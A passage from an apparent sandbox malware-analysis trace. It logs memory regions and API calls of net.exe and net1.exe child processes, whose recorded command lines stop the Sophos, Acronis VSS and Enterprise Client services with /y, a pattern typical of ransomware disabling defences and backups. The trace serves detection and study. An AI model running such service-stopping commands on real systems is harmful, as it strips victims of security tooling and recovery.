"private_0x0000000000090000" filename = "" Region: id = 3716 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3717 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3718 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3719 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 3720 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3721 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3722 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3723 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3724 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3725 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3726 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 377 os_tid = 0xfb0 Process: id = "52" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x24616000" os_pid = "0xfc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Sophos Clean Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3727 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3728 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3729 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3730 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 3731 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3732 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3733 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3734 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 3735 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3736 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3737 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3738 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3739 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 3740 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3741 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 381 os_tid = 0xfcc Process: id = "53" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x1aca5000" os_pid = "0xfd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0xf1c" cmd_line = "C:\\Windows\\system32\\net1 stop \"Acronis VSS Provider\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3742 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3743 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3744 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3745 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3746 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3747 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3748 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3749 start_va = 0xffda0000 end_va = 0xffdd2fff entry_point = 0xffda0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 3750 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3751 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3752 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3753 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3769 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 3770 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3771 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3772 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3773 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3774 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3775 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3776 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 3777 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3778 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3779 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 3780 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 3781 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3782 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 3783 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3784 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3785 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3786 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 3787 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3788 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3789 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3790 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3791 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3792 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3793 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3794 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3873 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 383 os_tid = 0xfd8 [0081.547] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf770 | out: lpSystemTimeAsFileTime=0x1cf770*(dwLowDateTime=0xe5c6b710, dwHighDateTime=0x1d48689)) [0081.547] GetCurrentProcessId () returned 0xfd4 [0081.547] GetCurrentThreadId () returned 0xfd8 [0081.547] GetTickCount () returned 0x1e474 [0081.547] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf778 | out: lpPerformanceCount=0x1cf778*=1812846500000) returned 1 [0081.548] GetModuleHandleW (lpModuleName=0x0) returned 0xffda0000 [0081.548] __set_app_type (_Type=0x1) [0081.548] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffdb9c9c) returned 0x0 [0081.548] __getmainargs (in: _Argc=0xffdc4780, _Argv=0xffdc4790, _Env=0xffdc4788, _DoWildCard=0, _StartInfo=0xffdc479c | out: _Argc=0xffdc4780, _Argv=0xffdc4790, _Env=0xffdc4788) returned 0 [0081.548] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0081.548] GetConsoleOutputCP () returned 0x1b5 [0081.548] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffdccec0 | out: lpCPInfo=0xffdccec0) returned 1 [0081.548] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0081.550] sprintf_s (in: _DstBuf=0x1cf718, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0081.550] setlocale (category=0, locale=".437") returned="English_United States.437" [0081.589] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0081.589] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0081.589] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Acronis VSS Provider\" /y" [0081.669] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf4b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0081.670] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0081.670] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cf708 | out: Buffer=0x1cf708*=0x3b4d60) returned 0x0 [0081.670] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cf708 | out: Buffer=0x1cf708*=0x3bc130) returned 0x0 [0081.670] _fileno (_File=0x7fefdba2a80) returned 0 [0081.670] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0081.670] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0081.670] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0081.670] _wcsicmp (_String1="config", _String2="stop") returned -16 [0081.670] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0081.670] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0081.670] _wcsicmp (_String1="file", _String2="stop") returned -13 [0081.670] _wcsicmp (_String1="files", _String2="stop") returned -13 [0081.670] _wcsicmp (_String1="group", _String2="stop") returned -12 [0081.670] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0081.670] _wcsicmp (_String1="help", _String2="stop") returned -11 [0081.670] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0081.670] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0081.670] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0081.670] _wcsicmp (_String1="session", _String2="stop") returned -15 [0081.670] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0081.670] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0081.670] _wcsicmp (_String1="share", _String2="stop") returned -12 [0081.671] _wcsicmp (_String1="start", _String2="stop") returned -14 [0081.671] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0081.671] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0081.671] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0081.671] _wcsicmp (_String1="accounts", _String2="Acronis VSS Provider") returned -15 [0081.671] _wcsicmp (_String1="computer", _String2="Acronis VSS Provider") returned 2 [0081.671] _wcsicmp (_String1="config", _String2="Acronis VSS Provider") returned 2 [0081.671] _wcsicmp (_String1="continue", _String2="Acronis VSS Provider") returned 2 [0081.671] _wcsicmp (_String1="cont", _String2="Acronis VSS Provider") returned 2 [0081.671] _wcsicmp (_String1="file", _String2="Acronis VSS Provider") returned 5 [0081.671] _wcsicmp (_String1="files", _String2="Acronis VSS Provider") returned 5 [0081.671] _wcsicmp (_String1="group", _String2="Acronis VSS Provider") returned 6 [0081.671] _wcsicmp (_String1="groups", _String2="Acronis VSS Provider") returned 6 [0081.671] _wcsicmp (_String1="help", _String2="Acronis VSS Provider") returned 7 [0081.671] _wcsicmp (_String1="helpmsg", _String2="Acronis VSS Provider") returned 7 [0081.671] _wcsicmp (_String1="localgroup", _String2="Acronis VSS Provider") returned 11 [0081.671] _wcsicmp (_String1="pause", _String2="Acronis VSS Provider") returned 15 [0081.671] _wcsicmp (_String1="session", _String2="Acronis VSS Provider") returned 18 [0081.671] _wcsicmp (_String1="sessions", _String2="Acronis VSS Provider") returned 18 [0081.671] _wcsicmp (_String1="sess", _String2="Acronis VSS Provider") returned 18 [0081.671] _wcsicmp (_String1="share", _String2="Acronis VSS Provider") returned 18 [0081.671] _wcsicmp (_String1="start", _String2="Acronis VSS Provider") returned 18 [0081.671] _wcsicmp (_String1="stats", _String2="Acronis VSS Provider") returned 18 [0081.671] _wcsicmp (_String1="statistics", _String2="Acronis VSS Provider") returned 18 [0081.671] _wcsicmp (_String1="stop", _String2="Acronis VSS Provider") returned 18 [0081.671] _wcsicmp (_String1="time", _String2="Acronis VSS Provider") returned 19 [0081.671] _wcsicmp (_String1="user", _String2="Acronis VSS Provider") returned 20 [0081.671] _wcsicmp (_String1="users", _String2="Acronis VSS Provider") returned 20 [0081.671] _wcsicmp (_String1="msg", _String2="Acronis VSS Provider") returned 12 [0081.671] _wcsicmp (_String1="messenger", _String2="Acronis VSS Provider") returned 12 [0081.671] _wcsicmp (_String1="receiver", _String2="Acronis VSS Provider") returned 17 [0081.671] _wcsicmp (_String1="rcv", _String2="Acronis VSS Provider") returned 17 [0081.671] _wcsicmp (_String1="netpopup", _String2="Acronis VSS Provider") returned 13 [0081.672] _wcsicmp (_String1="redirector", _String2="Acronis VSS Provider") returned 17 [0081.672] _wcsicmp (_String1="redir", _String2="Acronis VSS Provider") returned 17 [0081.672] _wcsicmp (_String1="rdr", _String2="Acronis VSS Provider") returned 17 [0081.672] _wcsicmp (_String1="workstation", _String2="Acronis VSS Provider") returned 22 [0081.672] _wcsicmp (_String1="work", _String2="Acronis VSS Provider") returned 22 [0081.672] _wcsicmp (_String1="wksta", _String2="Acronis VSS Provider") returned 22 [0081.672] _wcsicmp (_String1="prdr", _String2="Acronis VSS Provider") returned 15 [0081.672] _wcsicmp (_String1="devrdr", _String2="Acronis VSS Provider") returned 3 [0081.672] _wcsicmp (_String1="lanmanworkstation", _String2="Acronis VSS Provider") returned 11 [0081.672] _wcsicmp (_String1="server", _String2="Acronis VSS Provider") returned 18 [0081.672] _wcsicmp (_String1="svr", _String2="Acronis VSS Provider") returned 18 [0081.672] _wcsicmp (_String1="srv", _String2="Acronis VSS Provider") returned 18 [0081.672] _wcsicmp (_String1="lanmanserver", _String2="Acronis VSS Provider") returned 11 [0081.672] _wcsicmp (_String1="alerter", _String2="Acronis VSS Provider") returned 9 [0081.672] _wcsicmp (_String1="netlogon", _String2="Acronis VSS Provider") returned 13 [0081.672] _wcsupr (in: _String="Acronis VSS Provider" | out: _String="ACRONIS VSS PROVIDER") returned="ACRONIS VSS PROVIDER" [0081.672] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3bce40 [0081.677] GetServiceKeyNameW (in: hSCManager=0x3bce40, lpDisplayName="ACRONIS VSS PROVIDER", lpServiceName=0xffdc5750, lpcchBuffer=0x1cf628 | out: lpServiceName="", lpcchBuffer=0x1cf628) returned 0 [0081.678] _wcsicmp (_String1="msg", _String2="ACRONIS VSS PROVIDER") returned 12 [0081.678] _wcsicmp (_String1="messenger", _String2="ACRONIS VSS PROVIDER") returned 12 [0081.678] _wcsicmp (_String1="receiver", _String2="ACRONIS VSS PROVIDER") returned 17 [0081.678] _wcsicmp (_String1="rcv", _String2="ACRONIS VSS PROVIDER") returned 17 [0081.678] _wcsicmp (_String1="redirector", _String2="ACRONIS VSS PROVIDER") returned 17 [0081.678] _wcsicmp (_String1="redir", _String2="ACRONIS VSS PROVIDER") returned 17 [0081.678] _wcsicmp (_String1="rdr", _String2="ACRONIS VSS PROVIDER") returned 17 [0081.678] _wcsicmp (_String1="workstation", _String2="ACRONIS VSS PROVIDER") returned 22 [0081.678] _wcsicmp (_String1="work", _String2="ACRONIS VSS PROVIDER") returned 22 [0081.678] _wcsicmp (_String1="wksta", _String2="ACRONIS VSS PROVIDER") returned 22 [0081.678] _wcsicmp (_String1="prdr", _String2="ACRONIS VSS PROVIDER") returned 15 [0081.678] _wcsicmp (_String1="devrdr", _String2="ACRONIS VSS PROVIDER") returned 3 [0081.678] _wcsicmp (_String1="lanmanworkstation", _String2="ACRONIS VSS PROVIDER") returned 11 [0081.678] _wcsicmp (_String1="server", _String2="ACRONIS VSS PROVIDER") returned 18 [0081.678] _wcsicmp (_String1="svr", _String2="ACRONIS VSS PROVIDER") returned 18 [0081.678] _wcsicmp (_String1="srv", _String2="ACRONIS VSS PROVIDER") returned 18 [0081.678] _wcsicmp (_String1="lanmanserver", _String2="ACRONIS VSS PROVIDER") returned 11 [0081.679] _wcsicmp (_String1="alerter", _String2="ACRONIS VSS PROVIDER") returned 9 [0081.679] _wcsicmp (_String1="netlogon", _String2="ACRONIS VSS PROVIDER") returned 13 [0081.679] NetServiceControl (in: servername=0x0, service="ACRONIS VSS PROVIDER", opcode=0x0, arg=0x0, bufptr=0x1cf630 | out: bufptr=0x1cf630) returned 0x889 [0081.874] wcscpy_s (in: _Destination=0xffdc80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0081.874] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0081.875] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffdc5b50, nSize=0x800, Arguments=0xffdc7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0081.876] GetFileType (hFile=0xb) returned 0x2 [0081.877] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf4f8 | out: lpMode=0x1cf4f8) returned 1 [0081.877] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdc5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cf4f0, lpReserved=0x0 | out: lpBuffer=0xffdc5b50*, lpNumberOfCharsWritten=0x1cf4f0*=0x1e) returned 1 [0081.877] GetFileType (hFile=0xb) returned 0x2 [0081.877] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf4f8 | out: lpMode=0x1cf4f8) returned 1 [0081.877] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffda1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf4f0, lpReserved=0x0 | out: lpBuffer=0xffda1efc*, lpNumberOfCharsWritten=0x1cf4f0*=0x2) returned 1 [0081.878] _ultow (in: _Dest=0x889, _Radix=1897824 | out: _Dest=0x889) returned="2185" [0081.878] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffdc5b50, nSize=0x800, Arguments=0xffdc7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0081.878] GetFileType (hFile=0xb) returned 0x2 [0081.878] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf4f8 | out: lpMode=0x1cf4f8) returned 1 [0081.878] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdc5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cf4f0, lpReserved=0x0 | out: lpBuffer=0xffdc5b50*, lpNumberOfCharsWritten=0x1cf4f0*=0x34) returned 1 [0081.878] GetFileType (hFile=0xb) returned 0x2 [0081.879] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf4f8 | out: lpMode=0x1cf4f8) returned 1 [0081.879] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffda1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf4f0, lpReserved=0x0 | out: lpBuffer=0xffda1efc*, lpNumberOfCharsWritten=0x1cf4f0*=0x2) returned 1 [0081.879] NetApiBufferFree (Buffer=0x3b4d60) returned 0x0 [0081.879] NetApiBufferFree (Buffer=0x3bc130) returned 0x0 [0081.879] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Acronis VSS Provider\" /y" [0081.879] exit (_Code=2) Process: id = "54" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x25177000" os_pid = "0xfdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0xf38" cmd_line = "C:\\Windows\\system32\\net1 stop \"Enterprise Client Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3754 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3755 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3756 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3757 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3758 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3759 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3760 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3761 start_va = 0xffda0000 end_va = 0xffdd2fff entry_point = 0xffda0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 3762 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = 